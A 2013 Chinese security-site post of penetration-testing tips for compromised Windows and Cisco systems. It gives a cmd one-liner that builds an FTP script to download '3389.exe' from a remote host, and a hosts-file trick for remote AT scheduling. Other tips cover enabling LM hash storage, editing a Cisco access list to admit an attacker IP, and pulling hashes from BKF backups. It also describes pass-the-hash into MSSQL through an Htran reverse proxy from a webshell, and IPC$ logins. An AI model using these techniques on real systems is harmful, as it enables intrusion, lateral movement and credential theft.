当前位置: 爱尖刀 > 首页安全 > 漏洞补丁 > 正文

渗透测试技巧分享

2013-3-19 23:01 浏览次数:408 我来说两句(0)
1.AT時提示綁定句柄無效

經常碰到的這個問題,百度搜索的全部都沒一個能解決的。

正確的解決辦法是先在地址欄\\1.1.1.1 得到對方機器名,例如ADMINPC,然後,CMD

echo 1.1.1.1 ADMINPC >>C:\windows\system32\drivers\etc\hosts 

然後就可以at了,再也不會提示句柄無效了。

後記:其實也不需要對方的機器名,隨便echo 一個字符代替機器名即可。

2.ftp 一句話download

以前都是一個一個echo,然後ftp-s,很不方便,用下面的辦法吧

echo open 10.0.0.1 > o&echo user 1 1 >> o &echo get 3389.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o

3.針對VISTA以上作業系統禁用NTHASH

高級系統默認都是禁止了LMHASH,在滲透途中是件很不方便的事,按照下圖可以啟動LMHASH,不過需要更改密碼后生效,如果用戶不更改密碼,LMHASH不會儲存,適用于比較敏感的目標,沒事天天改密碼的類型。這辦法適用於無WCE的時代.

捕获.gif(缩略图)

4. 修改cisco access list 避免繁瑣的”佛跳牆”過程

ssh 登陸IP,x.x.x.x

登陸

enIPE_CISCO#show access-list 查看下要配置的list 例如需要訪問的服務器在VLAN103 IPE_CISCO#config IPE_CISCO#terminal IPE_CISCO#access-list 103 permit host 10.1.6.66 //允許這個IP訪問VLAN103所有的伺服器 IPE_CISCO#int vlan 103 IPE_CISCO#ip access-group 103 out IPE_CISCO#exit

5.BKF文件的利用

Webshell 環境下,提權無門,發現一BKF,Copy Downlaod,虛擬機還原,WINPE 替換shift,get hash

然後去試試目標的pass.

6.基於替換系統hash的SQL 入侵

已知目標系統HASH:

administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx

系統OS:2003,SQLSERVER 2008,目測該hash超過14位。(2003 默認為LMHASH,密碼超過14位則全000000000或者AA3DXXX)

已有webshell,提權無門,則通過Htran 反彈一條sock5代理,本地WCE替換為目標HASH,使用sock5代理連接MSSQL,認證選擇NT。

連上,完成。

7.注意Command.com 

 

這個命令存在很久了在遙遠的WIN95~WIN2003一直存在著,一直被忽略的對象,其實,它也能替代CMD。

8.當ipc$遇到帶“號密碼時

password is:O*"#~)GbU[x
net use \\127.0.0.1 "O*\"#~)GbU[x" /u:administrator

“號前加\即可解決問題。



欢迎您访问我们的全新网址,爱尖刀(http://www.ijiandao.com
遇到网络安全问题寻求帮助可以访问知安 http://www.knowsafe.com 与我们联络。
【想查看更多互联网新闻趣事,欢迎收听网络尖刀官方微信。(微信号:mcbang_com )】
收藏 分享 发布者: admin |
看完这篇文章,你的感受如何?


伤心


无视


惊讶


流汗


赞同


路过
热点聚焦
更多>>
情凝中秋,乐在团圆 中秋节又称团圆节,是从古代至今,对远方亲人思念之情的体现;也是东方 ... [详细]
传递爱心 帮助需要的人 中国红十字已不能信任,民政系统变的自私,在这样的环境下,很多需 ... [详细]
【D盾】- 携手啊D共推《 [详细]
父亲节(Father's D 温家宝:父爱,如大海般深沉而宽广。 我们的力量出自与父亲,我们的 ... [详细]
祝高考学子凯旋而归 明后两天,高中三年的最后两天,也是将会影响命运的两天! 3年=1095天 ... [详细]

Archiver|网络尖刀 ( 京ICP备14006288号-3 )  

GMT+8, 2017-1-20 00:54 , Processed in 0.207101 second(s), 20 queries , Gzip On.

请勿发布违反中华人民共和国法律法规的言论
郑重声明:本站会员观点不代表【网络尖刀】论坛官方立场。

Copyright© 2006-2016 IjianDao.Com All rights reserved. 网络尖刀 版权所有

回顶部